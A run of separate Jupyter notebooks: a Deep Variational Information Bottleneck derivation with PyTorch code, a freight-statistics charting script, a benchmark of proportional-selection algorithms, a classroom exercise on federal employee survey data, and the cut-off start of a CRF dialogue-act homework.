* We approximate $p(x,y)=p(x)p(y\mid x)$ using the empirical data distribution $p(x,y)=\frac{1}{n}\sum^{n}_{i=1}\delta_{x_i}(x)\delta_{y_i}(y)$ such that
$$\begin{align}
J_{IB}&= \int dxdydz p(z\mid x)p(y\mid x)p(x)\log q(y\mid z) -\beta\int dxdz p(x)p(z\mid x)\log \frac{p(z\mid x)}{q(z)}\\
&\approx \frac{1}{n}\sum^{n}_{i=1}\bigg[\int dz p(z\mid x_i)\log q(y_i\mid z)-\beta\int dz p(z\mid x_i)\log \frac{p(z\mid x_i)}{q(z)}\bigg]\\
&=\frac{1}{n}\sum^{n}_{i=1}\bigg[\int dz p(z\mid x_i)\log q(y_i\mid z)- \beta KL\Big(p(z\mid x_i)|| q(z)\Big) \bigg]
\end{align}$$
* By using an encoder parameterised as multivariate Gaussian
$$p_\phi(z\mid x)=\mathcal{N}\bigg(z;\boldsymbol{\mu}_\phi(x), \boldsymbol{\Sigma}_\phi(x)\bigg)$$
then we can use the reparameterisation trick such that $z=g_\phi(\epsilon,x)$ which is a deterministic function of $x$ and the Gaussian random variable $\epsilon\sim p(\epsilon)=\mathcal{N}(0,I)$.
* We assume that our choice of parameterisation of $p(z\mid x)$ and $q(z)$ allow for computation of an analytic KL-divergence,
Thus the final objective we would **minimise** is
$$J_{IB}=\frac{1}{n}\sum^{n}_{i=1}\Bigg[\beta KL\Big(p(z\mid x_i)|| q(z)\Big) - \mathbb{E}_{\epsilon\sim p(\epsilon)}\Big[\log q\big(y_i\mid g_\phi(\epsilon,x)\big)\Big]\Bigg]$$
where we have that
* $p_\phi(z\mid x)$ is the encoder parameterised as a multivariate Gaussian
$$p_\phi(z\mid x)=\mathcal{N}\bigg(z;\boldsymbol{\mu}_\phi(x), \boldsymbol{\Sigma}_\phi(x)\bigg)$$
* $q_\theta(y\mid z)$ is the decoder parameterised as an independent Bernoulli for each element $y_j$ of $y$ (for binary data)
$$q_\theta(y_j\mid z)=\text{Ber}\Big(\mu_\theta(z)\Big)$$
* $q(z)$ is the approximated latent marginal often fixed to a standard normal.
$$q_\theta(z)=\mathcal{N}\Big(z;\mathbf{0},\mathbf{I}_k\Big)$$
By using our parameterisation of the decoder $q_\theta(y\mid z)$ as an indepenedent Bernoulli we have that
$$-\log q_\theta(y\mid z)=-\Big[y\log \hat{y} + (1-y)\log(1-\hat{y})\Big]$$
i.e. this is the Binary Cross Entropy loss.
### Connection to Variational Autoencoder
The VAE is a special case of an unsupervised version of VIB with $\beta=1.0$ as they consider the objective
$$L=I(x;z)-\beta I(i;z)$$
where the aim is to take our data $x$ and maximise the mutual information contained in some encoding $z$, while restricting how much information we allow our representation to contain about the identity of each data element in our sample $i$. While this objective takes the same mathematical form as that of a Variational Autoencoder, the interpretation of the objective is very different:
* In the VAE, the model starts life as a generative model with a defined prior $p(z)$ and stochastic decoder $p(x|z)$ as part of the model, and the encoder $q(z|x)$ is created to serve as a variational approximation to the true posterior $p(z|x) = \frac{p(x|z)}{p(z)p(x)}$.
* In the VIB approach, the model is originally just the stochastic encoder $p(z|x)$, and the decoder $q(x|z)$ is the variational approximation to the true $p(x|z) = \frac{p(z|x)p(x)}{p(z)}$ and $q(z)$ is the variational approximation to the marginal $p(z) =\int dx p(x)p(z|x)$.
### References
* Original Deep VIB paper: https://arxiv.org/abs/1612.00410
# VIB: Code
The code is almost identical to my VAE implementation found here: [torch_vae](https://github.com/udeepam/vae/blob/master/notebooks/vae.ipynb)
**References:**
* https://github.com/makezur/VIB_pytorch
* https://github.com/sungyubkim/DVIB
* https://github.com/1Konny/VIB-pytorch
```
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import time
from collections import defaultdict
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.utils.data as data_utils
# Device Config
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Fix random seeds for reproducibility
seed = 73
torch.manual_seed(seed)
np.random.seed(seed)
```
## Load MNIST Dataset
```
# import torchvision
# from torchvision import transforms
# from torchvision.datasets import MNIST
# # 60000 tuples with 1x28x28 image and corresponding label
# data = MNIST('data',
# train=True,
# download=True,
# transform = transforms.Compose([transforms.ToTensor()]))
# # Split data into images and labels
# x_train = data.train_data
# y_train = data.train_labels
# # Scale images from [0,255] to [0,+1]
# x_train = x_train.float() / 255
# # Save as .npz
# np.savez_compressed('data/mnist_train',
# a=x_train,
# b=y_train)
# # 10000 tuples with 1x28x28 image and corresponding label
# data = MNIST('data',
# train=False,
# download=True,
# transform = transforms.Compose([transforms.ToTensor()]))
# # Split data into images and labels
# x_test = data.test_data
# y_test = data.test_labels
# # Scale images from [0,255] to [0,+1]
# x_test = x_test.float() / 255
# # Save as .npz
# np.savez_compressed('data/mnist_test',
# a=x_test,
# b=y_test)
# Load MNIST data locally
train_data = np.load('data/mnist_train.npz')
x_train = torch.Tensor(train_data['a'])
y_train = torch.Tensor(train_data['b'])
n_classes = len(np.unique(y_train))
test_data = np.load('data/mnist_test.npz')
x_test = torch.Tensor(test_data['a'])
y_test = torch.Tensor(test_data['b'])
# Visualise data
plt.rcParams.update({'font.size': 16})
fig, axes = plt.subplots(1,4, figsize=(35,35))
imx, imy = (28,28)
labels = [0,1,2,3]
for i, ax in enumerate(axes):
visual = np.reshape(x_train[labels[i]], (imx,imy))
ax.set_title("Example Data Image, y="+str(int(y_train[labels[i]])))
ax.imshow(visual, vmin=0, vmax=1)
plt.show()
```
## Models
```
class DeepVIB(nn.Module):
def __init__(self, input_shape, output_shape, z_dim):
"""
Deep VIB Model.
Arguments:
----------
input_shape : `int`
Flattened size of image. (Default=784)
output_shape : `int`
Number of classes. (Default=10)
z_dim : `int`
The dimension of the latent variable z. (Default=256)
"""
super(DeepVIB, self).__init__()
self.input_shape = input_shape
self.output_shape = output_shape
self.z_dim = z_dim
# build encoder
self.encoder = nn.Sequential(nn.Linear(input_shape, 1024),
nn.ReLU(inplace=True),
nn.Linear(1024, 1024),
nn.ReLU(inplace=True) )
self.fc_mu = nn.Linear(1024, self.z_dim)
self.fc_std = nn.Linear(1024, self.z_dim)
# build decoder
self.decoder = nn.Linear(self.z_dim, output_shape)
def encode(self, x):
"""
x : [batch_size,784]
"""
x = self.encoder(x)
return self.fc_mu(x), F.softplus(self.fc_std(x)-5, beta=1)
def decode(self, z):
"""
z : [batch_size,z_dim]
"""
return self.decoder(z)
def reparameterise(self, mu, std):
"""
mu : [batch_size,z_dim]
std : [batch_size,z_dim]
"""
# get epsilon from standard normal
eps = torch.randn_like(std)
return mu + std*eps
def forward(self, x):
"""
Forward pass
Parameters:
-----------
x : [batch_size,28,28]
"""
# flattent image
x_flat = x.view(x.size(0), -1)
mu, std = self.encode(x_flat)
z = self.reparameterise(mu, std)
return self.decode(z), mu, std
```
## Training
```
# Hyperparameters
beta = 1e-3
z_dim = 256
epochs = 200
batch_size = 128
learning_rate = 1e-4
decay_rate = 0.97
# Create DatatLoader
train_dataset = data_utils.TensorDataset(x_train, y_train)
train_dataloader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True)
# Loss function: Cross Entropy Loss (CE) + beta*KL divergence
def loss_function(y_pred, y, mu, std):
"""
y_pred : [batch_size,10]
y : [batch_size,10]
mu : [batch_size,z_dim]
std: [batch_size,z_dim]
"""
CE = F.cross_entropy(y_pred, y, reduction='sum')
KL = 0.5 * torch.sum(mu.pow(2) + std.pow(2) - 2*std.log() - 1)
return (beta*KL + CE) / y.size(0)
# Initialize Deep VIB
vib = DeepVIB(np.prod(x_train[0].shape), n_classes, z_dim)
# Optimiser
optimiser = torch.optim.Adam(vib.parameters(), lr=learning_rate)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimiser, gamma=decay_rate)
# Send to GPU if available
vib.to(device)
print("Device: ", device)
print(vib)
# Training
measures = defaultdict(list)
start_time = time.time()
# put Deep VIB into train mode
vib.train()
for epoch in range(epochs):
epoch_start_time = time.time()
# exponential decay of learning rate every 2 epochs
if epoch % 2 == 0 and epoch > 0:
scheduler.step()
batch_loss = 0
batch_accuracy = 0
for _, (X,y) in enumerate(train_dataloader):
X = X.to(device)
y = y.long().to(device)
# Zero accumulated gradients
vib.zero_grad()
# forward pass through Deep VIB
y_pred, mu, std = vib(X)
# Calculate loss
loss = loss_function(y_pred, y, mu, std)
# Backpropogation: calculating gradients
loss.backward()
# Update parameters of generator
optimiser.step()
# Save loss per batch
batch_loss += loss.item()*X.size(0)
# Save accuracy per batch
y_pred = torch.argmax(y_pred,dim=1)
batch_accuracy += int(torch.sum(y == y_pred))
# Save losses per epoch
measures['total_loss'].append(batch_loss / len(train_dataloader.dataset))
# Save accuracy per epoch
measures['accuracy'].append(batch_accuracy / len(train_dataloader.dataset))
print("Epoch: {}/{}...".format(epoch+1, epochs),
"Loss: {:.4f}...".format(measures['total_loss'][-1]),
"Accuracy: {:.4f}...".format(measures['accuracy'][-1]),
"Time Taken: {:,.4f} seconds".format(time.time()-epoch_start_time))
print("Total Time Taken: {:,.4f} seconds".format(time.time()-start_time))
```
## Testing
```
# Create DatatLoader
test_dataset = data_utils.TensorDataset(x_test, y_test)
test_dataloader = torch.utils.data.DataLoader(test_dataset,
batch_size=batch_size,
shuffle=True)
measures = defaultdict(int)
start_time = time.time()
# put Deep VIB into train mode
vib.eval()
with torch.no_grad():
for _, (X,y) in enumerate(test_dataloader):
X = X.to(device)
y = y.long().to(device)
# forward pass through Deep VIB
y_pred, mu, std = vib(X)
y_pred = torch.argmax(y_pred,dim=1)
measures['accuracy'] += int(torch.sum(y == y_pred))
print("Accuracy: {:.4f}...".format(measures['accuracy']/len(test_dataloader.dataset)),
"Time Taken: {:,.4f} seconds".format(time.time()-start_time))
```
| github_jupyter |
# US Air Freight and Waterway Volumes
---
A look at air and domestic waterway freight volumes, according to the US DOT Bureau of Transportation Statistics.
```
import pandas as pd
import altair as alt
from os import environ
import re
if environ.get("GITHUB_WORKFLOW"):
raise RuntimeError("Requires manual updates")
# https://www.transtats.bts.gov/osea/seasonaladjustment/
af_res = !curl -k 'https://transtats.bts.gov/osea/seasonaladjustment/?PageVar=AIR_RTMFM'
#print("\n".join(af_res))
af_raw = [r for r in af_res if "series:" in r]
df_af = pd.DataFrame.from_records(re.findall("'(\d\d/\d\d/\d\d\d\d \d\d:\d\d:\d\d)'\), y: (\d+)", "".join(af_raw)),
columns=["date", "tonMiles"])
df_af = df_af.dropna()
df_af['dt'] = df_af.date.apply(pd.to_datetime)
#df_af.head()
```
## US Airline Freight
```
alt.Chart(df_af).mark_line().encode(
alt.X('dt:T', axis=alt.Axis(title='')),
alt.Y('tonMiles:Q', axis=alt.Axis(title='Volume [ton-miles]'))
).properties(
title='US Air Freight Volume',
width=700,
height=400
)
df_af['change'] = df_af.set_index('dt')['tonMiles'].apply(int).pct_change(12).apply(lambda v: v * 100).values
c = alt.Chart(df_af).mark_bar(size=2).encode(
alt.X('dt:T', axis=alt.Axis(title='')),
alt.Y('change:Q', axis=alt.Axis(title='Year-over-Year Change [%]')),
tooltip=[alt.Tooltip('dt:T', title='Date'), alt.Tooltip('change:Q', title='% Change', format=',.01f')],
color=alt.condition(f"datum.change < 0",
alt.value('lightsalmon'),
alt.value('royalblue')
),
).properties(
title='US Air Freight Volume Growth',
width=750,
height=400
)
#c.save('transportation-air-waterway.png')
c.display()
```
## Internal US Waterways Shipping
```
wwf_res = !curl -k 'https://transtats.bts.gov/osea/seasonaladjustment/?PageVar=WATERBORNE'
wwf_raw = [r for r in wwf_res if "series:" in r]
df_wwf = pd.DataFrame.from_records(re.findall("'(\d\d/\d\d/\d\d\d\d \d\d:\d\d:\d\d)'\), y: (\d+)", "".join(wwf_raw)),
columns=["date", "megaShortTons"])
df_wwf = df_wwf.dropna()
df_wwf['dt'] = df_wwf.date.apply(pd.to_datetime)
#df_wwf.head()
alt.Chart(df_wwf).mark_line().encode(
alt.X('dt:T', axis=alt.Axis(title='')),
alt.Y('megaShortTons:Q', axis=alt.Axis(title='Volume [Million short tons]'))
).properties(
title='US Internal Waterways Shipping Volume',
width=700,
height=400
)
df_wwf['change'] = df_wwf.set_index('dt')['megaShortTons'].apply(int).pct_change(12).apply(lambda v: v * 100).values
alt.Chart(df_wwf).mark_bar(size=2).encode(
alt.X('dt:T', axis=alt.Axis(title='')),
alt.Y('change:Q', axis=alt.Axis(title='Year-over-Year Change [%]')),
tooltip=[alt.Tooltip('dt:T', title='Date'), alt.Tooltip('change:Q', title='% Change', format=',.01f')],
color=alt.condition(f"datum.change < 0",
alt.value('lightsalmon'),
alt.value('royalblue')
),
).properties(
title='US Internal Waterways Volume Growth',
width=750,
height=400
)
```
| github_jupyter |
Fast Proportional Selection
===
[RETWEET]
Proportional selection -- or, roulette wheel selection -- comes up frequently when developing agent-based models. Based on the code I have read over the years, researchers tend to write proportional selection as either a linear walk or a bisecting search. I compare the two approaches, then introduce Lipowski and Lipowska's [stochastic acceptance algorithm](http://arxiv.org/abs/1109.3627). For most of our uses, I argue that their algorithm is a better choice.
See also: This IPython notebook's [repository on GitHub](https://github.com/jbn/fast_proportional_selection).
Preliminaries
---
I will only use Python's internal random module for random number generation. I include numpy and pandas convenience only when running demos. I import seaborne because it overrides some matplotlib defaults in a pretty way.
```
import random
from bisect import bisect_left
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
%matplotlib inline
```
A Proportional Selection Base Class
---
I am interested in testing how the different algorithms perform when *implemented* and *used*. Algorithmic analysis gives us asymptotic estimations. From these, we know which algorithm should be the fastest, in the limit. But, for trivial values of $n$, asymptotics can be misleading. $O(1)$ is not always faster than $O(n)$. $O(1)$ is really $O(c)$, and $c$ can be very costly!
I use a base class, `ProportionalSelection`, to generate an equal playing field. This class takes the size of the vector of frequencies representing a distribution. I use frequencies because they are more natural to think about, and are easier to update. The client calls the `normalize` method any time the underlying frequencies change. Call the object like a dictionary to update a frequency.
```
class PropSelection(object):
def __init__(self, n):
self._n = n
self._frequencies = [0] * n
def copy_from(self, values):
assert len(values) == self._n
for i, x in enumerate(values):
self[i] = x
def __getitem__(self, i):
return self._frequencies[i]
def normalize(self):
pass
```
Linear Walk
---
Sampling via linear walk is $O(n)$. The algorithm generates a random number between 0 and the sum of the frequencies. Then, it walks through the array of frequencies, producing a running total. At some point the running total exceeds the generated threshold. The index at that point is the selection.
The algorithm has no cost associated with updates to the underlying frequency distribution.
```
class LinearWalk(PropSelection):
def __init__(self, n):
super(LinearWalk, self).__init__(n)
self._total = 0
def __setitem__(self, i, x):
self._total += (x - self._frequencies[i])
self._frequencies[i] = x
def sample(self):
terminal_cdf_point = random.randint(0, self._total - 1)
accumulator = 0
for i, k in enumerate(self._frequencies):
accumulator += k
if accumulator > terminal_cdf_point:
return i
```
Bisecting Search
---
Sampling via bisecting search is $O(log~n)$. From an asymptotic perspective, this is better than a linear walk. However, the algorithm achieves this by spending some compute time up front. That is, before sampling occurs. It cannot sample directly over the frequency distribution. Instead, it transforms the frequencies into a cumulative density function (CDF). This is an $O(n)$ operation. It must occur every time an element in the frequency distribution changes.
Given the CDF, the algorithm draws a random number from [0, 1). It then uses bisection to identify the insertion point in the CDF for this number. This point is the selected index.
```
class BisectingSearch(PropSelection):
def __init__(self, n):
super(BisectingSearch, self).__init__(n)
self._cdf = None
self._total = 0
def __setitem__(self, i, x):
self._total += (x - self._frequencies[i])
self._frequencies[i] = x
def normalize(self):
total = float(sum(self._frequencies))
cdf = []
accumulator = 0.0
for x in self._frequencies:
accumulator += (x / float(total))
cdf.append(accumulator)
self._cdf = cdf
def sample(self):
return bisect_left(self._cdf, random.random())
```
Stochastic Acceptance
---
For sampling, stochastic acceptance is $O(1)$. With respect to time, this dominates both the linear walk and bisecting search methods. Yet, this is asymptotic. The algorithm generates many random numbers per selection. In fact, the number of random variates grows in proportion to $n$. So, the random number generator matters.
This algorithm has another advantage. It can operate on the raw frequency distribution, like linear walk. It only needs to track the maximum value in the frequency distribution.
```
class StochasticAcceptance(PropSelection):
def __init__(self, n):
super(StochasticAcceptance, self).__init__(n)
self._max_value = 0
def __setitem__(self, i, x):
last_x = self._frequencies[i]
if x > self._max_value:
self._max_value = float(x)
elif last_x == self._max_value and x < last_x:
self._max_value = float(max(self._frequencies))
self._frequencies[i] = x
def sample(self):
n = self._n
max_value = self._max_value
freqs = self._frequencies
while True:
i = int(n * random.random())
if random.random() < freqs[i] / max_value:
return i
```
First Demonstration: Sampling
---
The following code generates a target frequency distribution. Then, it instantiates each algorithm; copies the frequency distribution; and, draws 10,000 samples. For each algorithm, this code compiles the resulting probability distribution. For comparison, I plot these side by side. In the figure below, the target distribution is to the left (green). The linear walk, bisecting search, and stochastic acceptance algorithms are to the right of the targert distribution (blue).
Visually, there is a compelling case for the distributions being equal.
```
fig, ax = plt.subplots(1, 4, sharey=True, figsize=(10,2))
def plot_proportions(xs, ax, **kwargs):
xs = pd.Series(xs)
xs /= xs.sum()
return xs.plot(kind='bar', ax=ax, **kwargs)
def sample_and_plot(roulette_algo, ax, n_samples=10000, **kwargs):
samples = [roulette_algo.sample() for _ in range(n_samples)]
value_counts = pd.Series(samples).value_counts().sort_index()
props = (value_counts / value_counts.sum())
props.plot(kind='bar', ax=ax, **kwargs)
return samples
freqs = np.random.randint(1, 100, 10)
plot_proportions(freqs,
ax[0],
color=sns.color_palette()[1],
title="Target Distribution")
klasses = [LinearWalk, BisectingSearch, StochasticAcceptance]
for i, klass in enumerate(klasses):
algo = klass(len(freqs))
algo.copy_from(freqs)
algo.normalize()
name = algo.__class__.__name__
xs = sample_and_plot(algo, ax=plt.subplot(ax[i+1]), title=name)
```
Second Demonstration: Performance Testing
---
The following code times the sample method for each algorithm. I am using the `timeit` module's `default_timer` for timing. For such fast functions, this may lead to measurement error. But, over 10,000 samples, I expect these errors to wash out.
```
import timeit
def sample_n_times(algo, n):
samples = []
for _ in range(n):
start = timeit.default_timer()
algo.sample()
samples.append(timeit.default_timer() - start)
return np.array(samples)
timings = []
for i, klass in enumerate(klasses):
algo = klass(len(freqs))
algo.copy_from(freqs)
algo.normalize()
name = algo.__class__.__name__
timings.append((name, sample_n_times(algo, 10000)))
```
The graph immediately below plots the kernel density estimation of timings for each algorithm. I truncate the results, limiting the range to everything less than the 90th percentile. (I'll explain why momentarily.) Bisecting search appears to be the fastest and the most stable. This makes sense. It has nice worse-case properties.
Stochastic acceptance and linear walk both display variability in timings. Again, the timer is not very precise. But, since bisecting search used the same timer, a comparison is possible. Linear walk has a worst case performance of $O(n)$. That is, if it starts at index 0 and generates the maximum value, it has to traverse the entire array. Bisecting search generates a stream of random numbers until finding an acceptable one. Technically, this algorithm has no limit. It could loop infinitely, waiting for a passing condition. But, probabilistically, this is fantastically unlikely. (Sometimes, you come across coders saying code like this is incorrect. That's pretty absurd. Most of the time, the probability of pathological conditions is so small, it's irrelevant. Most of the time, the machine running your code is more likely to crumb to dust before an error manifests.)
For real-time code, timing variability matters. Introduce some jitter into something like a HFT algorithm, and you lose. But, for agent-based models and offline machine learning, variability doesn't matter. For us, averages matter.
```
values = np.vstack([times for _, times in timings]).T
values = values[np.all(values < np.percentile(values, 90, axis=0), axis=1)]
sns.boxplot(values, names=[name for name, _ in timings]);
```
The relationship between algorithms remains the same. But, the difference between linear walk and stochastic acceptance grows. Over the entire distribution, stochastic acceptance lags both linear walk and bisecting search.
```
values = np.vstack([times for _, times in timings]).T
values = values[np.all(values > np.percentile(values, 90, axis=0), axis=1)]
sns.boxplot(values, names=[name for name, _ in timings]);
```
Third Demonstration: Average Time as a Function of N
---
The previous demonstrations fixed n to 10. What happens as n increases?
```
import timeit
def sample_n_times(algo, n):
samples = []
for _ in range(n):
start = timeit.default_timer()
algo.sample()
samples.append(timeit.default_timer() - start)
return np.array(samples)
averages = []
for n in [10, 100, 1000, 10000, 100000, 1000000]:
row = {'n': n}
freqs = np.random.randint(1, 100, n)
for i, klass in enumerate(klasses):
algo = klass(len(freqs))
algo.copy_from(freqs)
algo.normalize()
name = algo.__class__.__name__
row[name] = np.mean(sample_n_times(algo, 10000))
averages.append(row)
```
The following graph plots the average time as a function of n, the number of elements in the distribution. There is nothing unexpected. Linear walk gets increasingly terrible. It's $O(n)$. Bisecting search out-performs Stochastic acceptance. They appear to be converging. But, this convergence occurs at the extreme end of n. Few simulations sample over a distribution of 1,000,00 values.
At this point, it seems like bisecting search is the best choice.
```
averages_df = pd.DataFrame(averages).set_index('n')
averages_df.plot(logy=True, logx=True,
style={'BisectingSearch': 'o-',
'LinearWalk': 's--',
'StochasticAcceptance': 'd:'})#marker='o')
plt.ylabel('$Average runtime$');
```
Fourth Demonstration: Time Given a Dynamic Distribution
---
Many of my simulations use proportional selection with dynamic proportions. For example, consider preferential attachment in social network generation. Edges form probabilistically, proportional to a node's degree. But, when an edge forms, the degree changes as well. In this case, the distribution changes *for each sample*!
Below, I repeat the previous experiment, but I change the distribution and call `normalize` before each sample. Bisecting search is now the loser in this race. After each frequency alteration, it runs an expensive $O(n)$ operation. Then, it still must run its $O(log~n)$ operation at sample time. Linear walk and stochastic acceptance incur almost no performance penalty for alterations. Linear walk merely updates the total count. And, stochastic acceptance only runs a calculation if the alteration reduces the maximum value. (This hints at an important exception. As the range of frequencies narrows and the number of elements increases, performance suffers. The number of $O(n)$ searches for the new maximum becomes expensive.)
```
import timeit
def normalize_sample_n_times(algo, n_samples, n):
samples = []
for _ in range(n_samples):
algo[random.randint(0, n-1)] = random.randint(1, 100)
start = timeit.default_timer()
algo.normalize()
algo.sample()
samples.append(timeit.default_timer() - start)
return np.array(samples)
averages = []
for n in [10, 100, 1000, 10000, 100000]:
row = {'n': n}
freqs = np.random.randint(1, 100, n)
for i, klass in enumerate(klasses):
algo = klass(len(freqs))
algo.copy_from(freqs)
algo.normalize()
name = algo.__class__.__name__
row[name] = np.mean(normalize_sample_n_times(algo, 1000, n))
averages.append(row)
averages_df = pd.DataFrame(averages).set_index('n')
averages_df.plot(logy=True, logx=True,
style={'BisectingSearch': 'o-',
'LinearWalk': 's--',
'StochasticAcceptance': 'd:'})#marker='o')
plt.ylabel('$Average runtime$');
```
Conclusions
---
"Premature optimization is the root of all evil." This is programmer's cannon -- The Gospel According to Knuth. Certainly, I'm not advocating for heresy. I wrote this post after a project of mine demanded better performance. Execution took too long. I did some profiling. It told me that proportional selection dominated execution time. So, partially, this notebook is a guide for modelers in similar situations. Given a dynamic distribution and proportional selection, stochastic acceptance has great performance.
Outside of dynamic distributions, it does not dominate performance-wise in all cases. And, it is subject to jitter, making it questionable for real-time systems. But, it is robust across a variety of usage patterns. Furthermore, the algorithm is straight-forward to implement. The following code expresses it in it's simplest form. There are no dependencies, other than to a random number generator. And random number generation is a universal facility in programming languages.
```python
def random_proportional_selection(freqs, max_freq):
n = len(freqs)
while True:
i = int(n * random.random())
if random.random() < (freqs[i] / float(max_freq)):
return i
```
Given these properties, I think it makes a good default approach to proportional selection. And, rewards accrue to those who collect good defaults.
| github_jupyter |
# INFO 3402 – Class 16: Missing data exercise
[Brian C. Keegan, Ph.D.](http://brianckeegan.com/)
[Assistant Professor, Department of Information Science](https://www.colorado.edu/cmci/people/information-science/brian-c-keegan)
University of Colorado Boulder
Copyright and distributed under an [MIT License](https://opensource.org/licenses/MIT)
```
import numpy as np
import pandas as pd
%matplotlib inline
import matplotlib.pyplot as plt
import seaborn as sb
```
We'll use a dataset I partially cleaned from the Office of Personnel Management's [Federal Employees Viewpoint Survey](https://www.opm.gov/fevs/public-data-file), which has been distributed annually since 2010. If you're interested in how to clean up the data from the raw files, look at the Appendix notebook I uploaded.
The annual surveys ask approximately 80 questions about job satisfaction, organizational performance, manager competence, *etc*. as well as demographic variables about each respondent. Each annual survey has between 263,475 and 687,687 responses, which totals several hundred megabytes. Rather than sharing these individual survey responses, I extracted a handful of fields. The values of the survey items are on a Likert scale where 1 is "low" and 5 is "high".
* **count**: the number of responses in this category. Integer.
* **important work** (Q13): "The work I do is important". 1 = "Strongly Disagree" to 5 = "Strongly Agree".
* **work quality** (Q28): "How would you rate the overall quality of work done by your work unit?". 1 = "Very Poor" to 5 = "Very Good".
* **successful mission** (Q39): "My agency is successful at accomplishing its mission." 1 = "Strongly Disagree" to 5 = "Strongly Agree".
* **like work** (Q5): "I like the kind of work I do." 1 = "Strongly Disagree" to 5 = "Strongly Agree".
* **job satisfaction** (Q69): "Considering everything, how satisfied are you with your job?" 1 = "Very Dissatisfied" to 5 = "Very Satisfied"
* **org satisfaction** (Q71): "Considering everything, how satisfied are you with your organization?" 1 = "Very Dissatisfied" to 5 = "Very Satisfied"
I broke these responses down by a combination of demographic and other covariates.
* **year**: year of the survey. Values range from 2010 through 2018.
* **agency**: the parent federal agency/department.
* **subagency**: the child federal agency/department.
* **supervisor**: whether the employee is a supervisor or not.
* **sex**: male or female.
* **minority**: minority or not.
* **leaving**: "Are you considering leaving your organization within the next year, and if so, why?" Responses include "No", "Yes, to take another job within the federal government", "Yes, to take another job outside the federal government", and "Yes, other"
Read in the data.
```
df = pd.read_csv('fevs_summary_2010-2018.csv',encoding='utf8')
print("There are {0:,} rows.".format(len(df)))
df.tail(10)
```
## Explore missing data
Count the values for "supervisor", "sex", "minority", "leaving", and "agency" to confirm.
```
df['supervisor'].value_counts()
df['sex'].value_counts()
df['minority'].value_counts()
df['leaving'].value_counts()
df['agency'].value_counts()
```
Sort the values to find the demographic permutation with the greatest number of responses.
```
df.sort_values('count',ascending=False).head()
```
Use `pivot_table` to count the number of responses by year.
```
pd.pivot_table(df,index='year',values='count',aggfunc='sum')
```
Even though the demographics are balanced, it does not mean the survey responses are. Make a `nonan_df` using `dropna` to remove missing rows of data. How many rows of data remain after dropping the missing values under "count"?
```
nonan_df = df.dropna(subset=['count'])
len_before = len(df)
len_after = len(nonan_df)
print("There were {0:,} rows before and {1:,} rows after.".format(len_before,len_after))
```
Use boolean indexing and `pandas`'s [`.isnull()`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.isnull.html) method to make a new DataFrame called `missing_df` containing only the rows missing values.
```
missing_df = df[df['count'].isnull()]
missing_df.head()
```
Which agencies or subagencies have the most missing values? Which have the fewest?
```
pd.pivot_table(data = missing_df, columns = ['agency'], values = )
```
Are male or female demographics more likely to have missing data?
## Make a pivot table
Make a pivot table with "year" as indices, "agency" as columns, and the average "org satisfaction" as values.
```
pt = pd.pivot_table(df,index='year',columns='agency',values='org satisfaction',aggfunc='mean')
pt.plot(legend=False)
```
Average the pivot table by year. Which year had the highest satisfaction?
```
pt.mean(axis=1).sort_values()
```
Average the pivot table by agency. Which agency has the highest satisfaction?
```
pt.mean(axis=0).sort_values(ascending=False)
```
## Make exploratory pointplots
Use `seaborn` to make a [pointplot](https://seaborn.pydata.org/generated/seaborn.pointplot.html) of job satisfaction by year.
```
sb.pointplot(x='year',y='job satisfaction',data=df)
```
Update the pointplot to include a hue by supervisor status. What are interesting trends or differences?
```
sb.pointplot(x='year',y='job satisfaction',hue='supervisor',data=df)
```
Update the catplot to include column facets by sex. What are interesting trends or differences?
```
sb.catplot(x='year',y='work quality',hue='sex',data=df,kind='point',dodge=.25)
```
Make some other exploratory pointplots for this data.
```
df['agency'].value_counts()
sb.catplot(x='year',y='work quality',hue='sex',data=df.query("agency == 'Department of Energy'"),
kind='point',dodge=.25)
```
| github_jupyter |
# NLP HW3
Name : Thamme Gowda
USCID : 2074-6694-39
```
from itertools import chain
import nltk
import pycrfsuite as crf
import os, sys, glob, csv
from collections import namedtuple
import pandas as pd
import numpy as np
from collections import defaultdict as ddict
beep = lambda x: os.system("echo -n '\a';sleep 0.5;" * x)
beep(2)
# Code given by TAs
def get_utterances_from_file(dialog_csv_file):
"""Returns a list of DialogUtterances from an open file."""
reader = csv.DictReader(dialog_csv_file)
return [_dict_to_dialog_utterance(du_dict) for du_dict in reader]
def get_utterances_from_filename(dialog_csv_filename):
"""Returns a list of DialogUtterances from an unopened filename."""
with open(dialog_csv_filename, "r") as dialog_csv_file:
return get_utterances_from_file(dialog_csv_file)
def get_data(data_dir):
"""Generates lists of utterances from each dialog file.
To get a list of all dialogs call list(get_data(data_dir)).
data_dir - a dir with csv files containing dialogs"""
dialog_filenames = sorted(glob.glob(os.path.join(data_dir, "*.csv")))
for dialog_filename in dialog_filenames:
yield dialog_filename, get_utterances_from_filename(dialog_filename)
DialogUtterance = namedtuple("DialogUtterance", ("act_tag", "speaker", "pos", "text"))
PosTag = namedtuple("PosTag", ("token", "pos"))
def _dict_to_dialog_utterance(du_dict):
"""Private method for converting a dict to a DialogUtterance."""
# Remove anything with
for k, v in du_dict.items():
if len(v.strip()) == 0:
du_dict[k] = None
# Extract tokens and POS tags
if du_dict["pos"]:
du_dict["pos"] = [
PosTag(*token_pos_pair.split("/"))
for token_pos_pair in du_dict["pos"].split()]
return DialogUtterance(**du_dict)
class CrfClassifier(object):
def __init__(self, max_iters=50, l1_reg=1.0, l2_reg=1e-3):
self.trainer = crf.Trainer(verbose=False)
self.trainer.set_params({
'c1': l1_reg, # coefficient for L1 penalty
'c2': l2_reg, # coefficient for L2 penalty
'max_iterations': max_iters, # stop earlier
# include transitions that are possible, but not observed
'feature.possible_transitions': True
})
def featurize(self, idx, dialog):
feats = []
if idx == 0:
feats.append("BOD") # beginning of dialogue
else:
if dialog[idx].speaker != dialog[idx-1].speaker:
feats.append('SPKRCNG') # speaker Change
utterance = dialog[idx]
if utterance.pos is not None:
for i, pos in enumerate(utterance.pos):
feats.append("TOKEN_%s" % (pos.token))
feats.append("POS[%d]=%s" % (i+1, pos.pos))
else:
tokens = utterance.text.replace('>', '').replace('<', '').replace('.', '').split()
for i, tok in enumerate(tokens):
feats.append("ACTN[%d]=%s" % (i+1, tok))
return feats
